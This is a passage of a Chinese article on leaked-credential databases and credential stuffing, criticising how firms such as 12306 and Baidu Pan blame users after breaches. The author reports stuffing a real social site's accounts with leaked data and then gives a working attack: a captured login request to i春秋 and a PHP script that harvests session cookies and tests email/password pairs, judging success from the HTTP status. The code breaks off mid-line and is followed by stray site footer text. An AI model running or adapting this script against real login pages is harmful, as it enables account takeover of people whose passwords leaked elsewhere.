&/p&&p&bokeh:地图,热力图,处理大数据量。&/p&&/blockquote&&p&再比如,每年都会有权威机构对常见密码进行统计,国外最大约炮网站国家分布图,等等,这些也都是从社工库调研而来的。甚至有人调侃,“社工库推进了基于社会的大数据分析”。&/p&&p&对于社工库的数据分析,有一点需要注意,就是学会清洗数据,比如星座分布这种一般就不靠谱,因为大部分网站如果用户不填写数据,默认都是1月1日,如果盲目统计,你会发现摩羯座占比最多。&/p&&br&&h2&&ul&&li&&b&危害之最——撞库&/b&&br&&/li&&/ul&&br&&/h2&&p&对于企业而言,社工库最大的危害就是撞库,没有之一。撞库,顾名思义,就是黑客通过社工库的已知账号和密码,去模拟登陆其他企业网站,最终得到了一批可以登录这些网站的数据。&/p&&p&对于账号安全,很多公司都是非常敏感的,比如网易数据泄露的新闻刚一出来,网易公关就马上到处发表声明说网易很安全,数据泄露和网易没关系,而是黑客从这些年的其它各大公司数据泄露中提取了所有网易邮箱账号,结尾又再次声明网易多么重视用户安全。&/p&&p&各大公司,当发生账号数据泄露的时候,都是尽可能极度撇清关系,再说两个事。&/p&&p&一个是2014年底,12306网站十几万用户数据泄露,我当时特别测试了下,大部分账号都可以登录。按照道理说,这些账号一旦泄露,应该第一时间冻结这些账号,以免遭到攻击者攻击。而12306却不是,不但没有保护这些受害用户,反倒是第一时间证明自己没有漏洞,这些数据来自其他网站的漏洞,而用户在12306使用了和其它有漏洞网站相同的账号和密码。这就是所谓的“撞库”。&/p&&p&第二个事情,是去年百度网盘有大量用户投诉,自己的网盘资料被莫名删光,并塞满了日本动作片,疑似数据泄露。同样的问题,厂商处理问题同样的套路————用户们,这和我们百度没关系,这是黑客通过撞库入侵了你们的账号。你们自己的账号密码,曾经在第三方平台泄露过,被攻击的用户们,你们改密码吧,你们密码不安全。&/p&&p&某个企业数据库泄露,企业的所有账号密码被窃取,也就是一手数据(比如京东12G数据就是一手数据),有几个点需要注意:&/p&&ol&&li&对于黑产而言非常重要,这里包含了大量的用户的账户和密码。&/li&&li&由于很多用户不同网站设置了相同密码,这些一手数据,几乎可以登录用户注册过的各类网站。&br&&/li&&li&企业对于自己的数据泄露,需要承担全部责任。&/li&&/ol&&p&再来看所谓的二手数据,什么是二手数据呢?黑客窃取到某个大型企业的一手数据,用这些数据去模拟登陆网站B,将登陆成功的数据进行汇总,得到一批B网站的账号密码,这些数据就是二手数据。不要小看二手数据,因为这些数据是可以操作B网站用户的,比如百度网盘数据泄露、12306数据泄露,都属于二手数据。那么二手数据也有几个特点:&/p&&p&1. 是一手数据的一个子集,往往数据规模较小,几十万到几百万不等。&/p&&p&2. 危害性同一手数据一样大,对用户造成严重安全问题。&/p&&p&3. 企业一般不愿意承担责任,认为是用户自己的问题。&/p&&p&按照目前数据泄露,企业攻击来看,每年都有大量的二手数据攻击,以及贩卖用户信息和网站资产。&/p&&p&用户在某个网站注册了账号,结果这个网站上的数据被黑客窃取了,或者篡改了,然后网站告知用户“网站很安全”,但是结果是用户被攻击了。那么对于用户而言,他的损失谁来承担?从过去的一些案例来看,这类攻击全部由用户自己承担。那么问题来了,用户稀里糊涂的被攻击被损失,还要自己承担责任,我们都知道谁做错谁承担,用户做错了什么?&/p&&p&1. 谁叫用户把每个网站设置成同一个密码。&/p&&p&2. 用户不应该用自己被公开泄露的密码。&/p&&br&&p&&b&以上回答,便是一些厂商的态度,这些厂商根本就不负责任。&/b&&/p&&p&1. 作为用户而言,根本不知道自己的账号密码已经被泄露,也没有渠道获取自己的账号密码被泄露。&/p&&p&2. 一手数据一旦公布,企业、国家都拼了命的删帖、删新闻、关闭泄露源,根本不给用户知情权。&/p&&p&综上所述,我认为,无论一手数据、还是二手数据,都应该由企业自己承担相应的责任,企业有义务保证所有用户的账号数据安全。&/p&&p&我自己做测试,通过社工库数据,对某国外社交网站进行撞库,测试结果如下:&/p&&p&100万数据,邮箱和对应密码&/p&&p&约2.8万邮箱,为该网站注册用户&/p&&p&其中1.8万,撞库成功&/p&&p&也就是说,用100万社工数据,轻松获取社交网站1.8万的真实用户的账号和密码,危害非常大。得到这些账号以后,我可以做营销、做推广、发垃圾新闻,等等。&/p&&p&还有一个点,不知道大家注意到没有,2.8万注册中,有1.8万撞库成功,也就是说有64%用户在该网站使用了和社工库相同的密码。换句话说,超过一半用户,会在多个网站使用相同密码。毕竟,让一个用户在不同网站用不同密码,用户很难记住那么多密码的。&/p&&p&在这个过程中,目标网站并不存在系统漏洞,但是黑客却可以轻松窃取大量用户账号,可想而知,对企业的危害程度有多大。&/p&&br&&h2&&ul&&li&&b&社工库攻击演示&/b&&br&&/li&&/ul&&br&&/h2&&p&这里以i春秋为例子,我们做一个测试攻击,来给大家演示如何撞库。整个过程非常简单,核心点就是抓包。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-35751eeacd86de86a6f13b8f64b854bf_b.png& data-rawwidth=&882& data-rawheight=&831& class=&origin_image zh-lightbox-thumb& width=&882& data-original=&https://pic4.zhimg.com/v2-35751eeacd86de86a6f13b8f64b854bf_r.jpg&&&/figure&&br&&p&i春秋的登陆curl:&/p&&div class=&highlight&&&pre&&code class=&language-bash&&&span&&/span&curl &span class=&s1&&'https://user.ichunqiu.com/login/signin'&/span&
-H &span class=&s1&&'Host: user.ichunqiu.com'&/span&
-H &span class=&s1&&'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/ Firefox/51.0'&/span&
-H &span class=&s1&&'Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8'&/span&
-H &span class=&s1&&'Accept-Language: zh-CN,q=0.8,en-US;q=0.5,q=0.3'&/span&
-H &span class=&s1&&'Accept-Encoding: gzip, deflate, br'&/span&
-H &span class=&s1&&'Referer: [url]https://user.ichunqiu.com/login?s=bbs&r=http%3A%2F%2Fbbs.ichunqiu.com%2Fportal.php'&/span&&span class=&o&&[&/span&/url&span class=&o&&]&/span&
-H &span class=&s1&&'Cookie: __jsluid=976fa33f9dadc6a6cdcfcf4fedac6a2e; pgv_pvi=; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2a8e03049eaceca9480870; Hm_lvt_1a32f7cdbb022=,,,; browse=CFlaTxUYU0xdWBtPX0hTV1tTWUJDQVpYWVRIRFlLWURTUF5XVRhTQF5UWkBVAlNEUFlKR15AXlhZUEVFV1FYRVNRWk9eREtOFA; Hm_lpvt_1a32f7cdbb022=; pgv_si=s; Hm_lpvt_2a8e03049eaceca9563769; ci_session=8cde5cded8fd1e220ac3d58eb4efb4ae33a45c12'&/span&
-H &span class=&s1&&'Connection: keep-alive'&/span&
-H &span class=&s1&&'Upgrade-Insecure-Requests: 1'&/span&
-H &span class=&s1&&'Content-Type: application/x-www-form-urlencoded'&/span&
--data &span class=&s1&&'username=name%40mail.com&password=111111&yzm='&/span&
&/code&&/pre&&/div&&p&最后的data就是post的传参,包括账号和密码。经过测试,发现i春秋做了特殊处理,如果只改data的账号和密码,就算传递的是正确账号密码,也不会登陆成功。经过排查,最终确认,i春秋的登陆,除了账号和密码,还和ci_session有关系,而其它的内容都可以删除,最后简化成:&/p&&div class=&highlight&&&pre&&code class=&language-bash&&&span&&/span&curl &span class=&s1&&'https://user.ichunqiu.com/login/signin'&/span&
-H &span class=&s1&&'Cookie: ci_session=8cde5cded8fd1e220ac3d58eb4efb4ae33a45c12'&/span&
--data &span class=&s1&&'username=name%40mail.com&password=111111&yzm='&/span&
&/code&&/pre&&/div&&p&再次测试发现,相同ci_session,登陆不同的账号,无法成功,也就是说一个ci_session只能用来登陆一个账号。那么如何构造一个有效的session呢?很简单,模拟访问一次登陆的网页即可。最终模拟登陆的代码如下:&/p&&div class=&highlight&&&pre&&code class=&language-php&&&span&&/span&&span class=&cp&&&?php&/span&
&span class=&k&&function&/span& &span class=&nf&&get_session&/span&&span class=&p&&()&/span&
&span class=&p&&{&/span&
&span class=&nv&&$ch&/span& &span class=&o&&=&/span& &span class=&nb&&curl_init&/span&&span class=&p&&();&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span&&span class=&nx&&CURLOPT_URL&/span&&span class=&p&&,&/span& &span class=&s1&&'https://user.ichunqiu.com/login/signin'&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_RETURNTRANSFER&/span&&span class=&p&&,&/span& &span class=&mi&&1&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_HEADER&/span&&span class=&p&&,&/span& &span class=&mi&&1&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_NOBODY&/span&&span class=&p&&,&/span& &span class=&k&&false&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_SSL_VERIFYHOST&/span&&span class=&p&&,&/span& &span class=&k&&false&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_SSL_VERIFYPEER&/span&&span class=&p&&,&/span& &span class=&k&&false&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_USERAGENT&/span&&span class=&p&&,&/span& &span class=&s1&&'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/ Firefox/51.0'&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_COOKIE&/span&&span class=&p&&,&/span& &span class=&s1&&'__jsluid=976fa33f9dadc6a6cdcfcf4fedac6a2e; pgv_pvi=; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2a8e03049eaceca9480870; Hm_lvt_1a32f7cdbb022=,,,; uid=NcjxQpwhMpDiEc3hKujnFqoieuTE0NW browse=CFlaTxUYU0xdWBtPX0hTV1tTWUJDQVpYWVRIRFlLWURTUF5XVRhTQF5UWkBVAlNEUFlKR15AXlhZUEVFV1FYRVNRWk9eREtOFA; Hm_lpvt_1a32f7cdbb022=; pgv_si=s; ci_session=1ec3bdbc38f735b739 Hm_lpvt_2a8e03049eaceca9482188'&/span&&span class=&p&&);&/span&
&span class=&nv&&$output&/span& &span class=&o&&=&/span& &span class=&nb&&curl_exec&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&);&/span&
&span class=&k&&if&/span&&span class=&p&&(&/span&&span class=&k&&false&/span& &span class=&o&&==&/span& &span class=&nv&&$output&/span&&span class=&p&&)&/span&
&span class=&p&&{&/span&
&span class=&k&&echo&/span& &span class=&s1&&'session error'&/span&&span class=&p&&;&/span&
&span class=&k&&return&/span& &span class=&k&&false&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&span class=&nb&&preg_match&/span&&span class=&p&&(&/span&&span class=&s1&&'/ci_session=(.*?);/'&/span&&span class=&p&&,&/span& &span class=&nv&&$output&/span&&span class=&p&&,&/span& &span class=&nv&&$match&/span&&span class=&p&&);&/span&
&span class=&k&&if&/span&&span class=&p&&(&/span&&span class=&o&&!&/span&&span class=&nv&&$match&/span&&span class=&p&&[&/span&&span class=&mi&&1&/span&&span class=&p&&])&/span&
&span class=&p&&{&/span&
&span class=&k&&echo&/span& &span class=&s1&&'session error'&/span&&span class=&p&&;&/span&
&span class=&k&&return&/span& &span class=&k&&false&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&span class=&k&&return&/span& &span class=&nv&&$match&/span&&span class=&p&&[&/span&&span class=&mi&&1&/span&&span class=&p&&];&/span&
&span class=&p&&}&/span&
&span class=&k&&function&/span& &span class=&nf&&login&/span&&span class=&p&&(&/span&&span class=&nv&&$account&/span&&span class=&p&&,&/span& &span class=&nv&&$password&/span&&span class=&p&&)&/span&
&span class=&p&&{&/span&
&span class=&nv&&$session&/span& &span class=&o&&=&/span& &span class=&nx&&get_session&/span&&span class=&p&&();&/span&
&span class=&k&&if&/span&&span class=&p&&(&/span&&span class=&o&&!&/span&&span class=&nv&&$session&/span&&span class=&p&&)&/span&
&span class=&p&&{&/span&
&span class=&k&&return&/span& &span class=&k&&false&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&span class=&nv&&$data&/span& &span class=&o&&=&/span& &span class=&nb&&http_build_query&/span&&span class=&p&&(&/span&&span class=&k&&array&/span&&span class=&p&&(&/span&&span class=&s1&&'username'&/span& &span class=&o&&=&&/span& &span class=&nv&&$account&/span&&span class=&p&&,&/span& &span class=&s1&&'password'&/span& &span class=&o&&=&&/span& &span class=&nv&&$password&/span&&span class=&p&&,&/span& &span class=&s1&&'yzm'&/span& &span class=&o&&=&&/span& &span class=&s1&&''&/span&&span class=&p&&));&/span&
&span class=&nv&&$ch&/span& &span class=&o&&=&/span& &span class=&nb&&curl_init&/span&&span class=&p&&();&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span&&span class=&nx&&CURLOPT_URL&/span&&span class=&p&&,&/span& &span class=&s1&&'https://user.ichunqiu.com/login/signin'&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_RETURNTRANSFER&/span&&span class=&p&&,&/span& &span class=&mi&&1&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_HEADER&/span&&span class=&p&&,&/span& &span class=&mi&&1&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_NOBODY&/span&&span class=&p&&,&/span& &span class=&k&&false&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_SSL_VERIFYHOST&/span&&span class=&p&&,&/span& &span class=&k&&false&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_SSL_VERIFYPEER&/span&&span class=&p&&,&/span& &span class=&k&&false&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_USERAGENT&/span&&span class=&p&&,&/span& &span class=&s1&&'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/ Firefox/51.0'&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_COOKIE&/span&&span class=&p&&,&/span& &span class=&s2&&&ci_session=&/span&&span class=&si&&$session&/span&&span class=&s2&&;&&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_POST&/span&&span class=&p&&,&/span& &span class=&k&&true&/span&&span class=&p&&);&/span&
&span class=&nb&&curl_setopt&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&,&/span& &span class=&nx&&CURLOPT_POSTFIELDS&/span&&span class=&p&&,&/span& &span class=&nv&&$data&/span&&span class=&p&&);&/span&
&span class=&nv&&$output&/span& &span class=&o&&=&/span& &span class=&nb&&curl_exec&/span&&span class=&p&&(&/span&&span class=&nv&&$ch&/span&&span class=&p&&);&/span&
&span class=&k&&if&/span&&span class=&p&&(&/span&&span class=&nb&&strpos&/span&&span class=&p&&(&/span&&span class=&nv&&$output&/span&&span class=&p&&,&/span& &span class=&s1&&'302 Found'&/span&&span class=&p&&))&/span&
&span class=&p&&{&/span&
&span class=&k&&return&/span& &span class=&k&&true&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&span class=&k&&else&/span& &span class=&k&&if&/span&&span class=&p&&(&/span&&span class=&nb&&strpos&/span&&span class=&p&&(&/span&&span class=&nv&&$output&/span&&span class=&p&&,&/span& &span class=&s1&&'200 OK'&/span&&span class=&p&&))&/span&
&span class=&p&&{&/span&
&span class=&k&&return&/span& &span class=&k&&false&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&span class=&k&&else&/span&
&span class=&p&&{&/span&
&span class=&k&&echo&/span& &span class=&s1&&'login error'&/span&&span class=&p&&;&/span&
&span class=&k&&return&/span& &span clas}

我要回帖

更多关于 按键精灵提取源代码 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信